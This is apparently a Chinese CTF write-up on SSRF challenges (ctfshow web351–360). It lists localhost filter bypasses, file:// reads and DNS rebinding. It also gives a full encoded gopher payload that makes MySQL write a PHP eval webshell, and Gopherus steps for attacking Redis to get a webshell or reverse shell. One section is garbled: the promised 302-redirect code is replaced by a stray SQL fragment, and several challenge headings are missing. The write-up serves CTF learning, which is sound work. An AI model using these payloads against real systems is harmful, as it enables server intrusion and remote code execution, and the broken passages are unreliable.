web 351
前置
curl_init — 初始化 cURL 会话,返回 cURL 句柄,供curl_setopt()、 curl_exec() 和 curl_close() 函数使用。
注意:如果设置了 open_basedir,file 协议会被 cURL 禁用。
curl_setopt — 设置 cURL 传输选项
curl_exec — 执行 cURL 会话
解题
我们直接访问flag.php,显示非本地用户禁止访问,两种方法
url=http://127.0.0.1/flag.php
url=file:///var/www/html/flag.php
前置
parse_url — 解析 URL,返回其组成部分,本函数解析一个 URL 并返回一个关联数组,包含在 URL 中出现的各种组成部分。
解题
过滤了localhost和127.0.0
十六进制
url=http://0x7F.0.0.1/flag.php
八进制
url=http://0177.0.0.1/flag.php
10 进制整数格式
url=http://2130706433/flag.php
16 进制整数格式,还是上面那个网站转换记得前缀0x
url=http://0x7F000001/flag.php
还有一种特殊的省略模式
127.0.0.1写成127.1
用CIDR绕过localhost
url=http://127.127.127.127/flag.php
还有很多方式
url=http://0/flag.php
url=http://0.0.0.0/flag.php
在线进制转换
web353同上
web354
这次ban掉了0和1
DNS重绑定的绕过:
1·修改自己域名的a记录,改成127.0.0.1
2·这个网站a记录指向127.0.0.1 可以直接利用
url=http://sudo.cc/flag.php
3.302跳转绕过
在自己网站主页加上这个
' INTO OUTFILE '/var/www/html/2.php';
gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%4a%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%70%61%73%73%5d%29%3b%20%3f%3e%27%20%49%4e%54%4f%20%4f%55%54%46%49%4c%45%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%32%2e%70%68%70%27%3b%01%00%00%00%01
把_后面那一大段内容再url编码一次,因为curl会默认解码一次
发包,再访问2.php,利用pass写入命令即可
web360提示:打redis
ssrf打redis,基本上四种攻击方式:
- 写webshell
- 写ssh公钥
- 写contrab计划任务反弹shell
- 主从复制
具体打redis的原理参考这篇文章: 浅析Redis中SSRF的利用
python gopherus.py --exploit redis
一句话
访问shell.php(默认生成)
进行rce
